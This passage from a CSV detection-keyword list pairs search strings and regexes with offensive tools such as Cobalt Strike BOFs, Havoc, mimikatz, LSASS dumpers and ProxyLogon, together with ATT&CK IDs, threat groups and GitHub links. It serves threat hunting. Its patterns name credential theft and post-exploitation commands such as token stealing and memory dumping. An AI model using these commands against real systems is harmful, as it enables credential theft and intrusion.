"*timestomp.x64.o*",".{0,1000}timestomp\.x64\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","61353" "*timing_attack * --brute-force*",".{0,1000}timing_attack\s.{0,1000}\s\-\-brute\-force.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","61354" 
"*timwhitez/Doge-Loader*",".{0,1000}timwhitez\/Doge\-Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","N/A","10","10","280","57","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z","61355" "*TinyMet v0.2\ntinymet.com*",".{0,1000}TinyMet\sv0\.2\\ntinymet\.com.{0,1000}","offensive_tool_keyword","TinyMet","meterpreter stager","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 
- TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","CL0P - FIN7 - FIN11 - Silence group - GOLD EVERGREEN","C2","https://github.com/SherifEldeeb/TinyMet","1","0","N/A","N/A","10","10","128","43","2019-08-20T04:39:22Z","2014-05-17T13:31:55Z","61357" "*tinyurl.com/haxshl*",".{0,1000}tinyurl\.com\/haxshl.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","1","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","61358" "*title logon backdoor*",".{0,1000}title\slogon\sbackdoor.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","61359" "*Tkn_Access_Check.ps1*",".{0,1000}Tkn_Access_Check\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","61360" "*TlRMTVNTUAABAAAABQKIoAAAAAAAAAAAAAAAAAAAAAA=*",".{0,1000}TlRMTVNTUAABAAAABQKIoAAAAAAAAAAAAAAAAAAAAAA\=.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hakivvi/proxylogon","1","0","#base64","N/A","10","1","20","6","2022-04-23T03:21:44Z","2021-03-14T13:04:07Z","61361" 
"*TlRMTVNTUAABAAAABYIIAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAwAAAA*",".{0,1000}TlRMTVNTUAABAAAABYIIAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAwAAAA.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","ntlm decoder","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61362" "*TlRMTVNTUAABAAAAMpCI4gAAAAAoAAAAAAAAACgAAAAGAbEdAAAADw==*",".{0,1000}TlRMTVNTUAABAAAAMpCI4gAAAAAoAAAAAAAAACgAAAAGAbEdAAAADw\=\=.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","0","#base64","N/A","8","1","35","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z","61363" "*TlRMTVNTUAACAAAABgAGADgAAAAFAomih5Y9EpIdLmMAAAAAAAAAAIAAgAA*",".{0,1000}TlRMTVNTUAACAAAABgAGADgAAAAFAomih5Y9EpIdLmMAAAAAAAAAAIAAgAA.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","61364" "*tls-scanner -connect *:*",".{0,1000}tls\-scanner\s\-connect\s.{0,1000}\:.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","61365" "*TM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACf0hwW27NyRduzckXbs3JFZvzkRdqz*",".{0,1000}TM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACf0hwW27NyRduzckXbs3JFZvzkRdqz.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. 
This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","#base64","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","61366" "*tmdb-get-company-names *",".{0,1000}tmdb\-get\-company\-names\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","61372" "*tmenochet/PowerDump*",".{0,1000}tmenochet\/PowerDump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","61373" "*tmp*ciscophones.tgz*",".{0,1000}tmp.{0,1000}ciscophones\.tgz.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","61376" "*tmp*lsass_*.dmp*",".{0,1000}tmp.{0,1000}lsass_.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","61377" 
"*tmp.pico.sh*",".{0,1000}tmp\.pico\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","61378" "*Tmprovider.dll*",".{0,1000}Tmprovider\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - 
menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","61379" "*TMVB6XJWzuz4KsqUCnwxrtooQV9LmP6R4IX62HeQ7OZzhxgsahsxNzf05dJNkntl*",".{0,1000}TMVB6XJWzuz4KsqUCnwxrtooQV9LmP6R4IX62HeQ7OZzhxgsahsxNzf05dJNkntl.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","61380" "*tNidhoggClient.exe*",".{0,1000}tNidhoggClient\.exe.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","61381" "*to $LogonPasswords*",".{0,1000}to\s\$LogonPasswords.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool 
CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","61382" "*To dump lsass memory using *",".{0,1000}To\sdump\slsass\smemory\susing\s.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","61383" "*to_powershell.ducky_script*",".{0,1000}to_powershell\.ducky_script.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61385" "*toggle_privileges.cna*",".{0,1000}toggle_privileges\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - 
RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","N/A","10","10","55","20","2024-07-10T16:20:39Z","2021-09-14T17:47:08Z","61386" "*toggle_privileges_bof.*",".{0,1000}toggle_privileges_bof\..{0,1000}","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","N/A","10","10","55","20","2024-07-10T16:20:39Z","2021-09-14T17:47:08Z","61387" "*Toggle_Token_Privileges_BOF*",".{0,1000}Toggle_Token_Privileges_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","N/A","10","10","55","20","2024-07-10T16:20:39Z","2021-09-14T17:47:08Z","61388" 
"*ToggleWDigest*",".{0,1000}ToggleWDigest.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","N/A","10","10","219","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z","61389" "*token find-tokens*",".{0,1000}token\sfind\-tokens.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - 
T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","61391" "*token impersonate *",".{0,1000}token\simpersonate\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","61392" "*token privs-get*",".{0,1000}token\sprivs\-get.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","61393" "*token privs-list*",".{0,1000}token\sprivs\-list.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","61394" "*token steal *",".{0,1000}token\ssteal\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and 
control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","61395" "*token swapped. Restoring PreviousMode and spawning system shell*",".{0,1000}token\sswapped\.\sRestoring\sPreviousMode\sand\sspawning\ssystem\sshell.{0,1000}","offensive_tool_keyword","POC","Windows Privilege escalation POC exploitation for CVE-2024-49138","T1068 - T1058 - T1203","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/CVE-2024-49138-POC","1","0","#content","N/A","9","1","1","0","2025-01-15T01:01:21Z","2025-01-15T02:11:49Z","61396" "*token* -CreateProcess * -ProcessId *",".{0,1000}token.{0,1000}\s\-CreateProcess\s.{0,1000}\s\-ProcessId\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Start new process with token of a specific user. Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","61397" "*token* -ImpersonateUser -Username *",".{0,1000}token.{0,1000}\s\-ImpersonateUser\s\-Username\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Start new process with token of a specific user. Tokens can be impersonated from other users with a session/running processes on the machine. 
Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","61398" "*token::elevate*",".{0,1000}token\:\:elevate.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 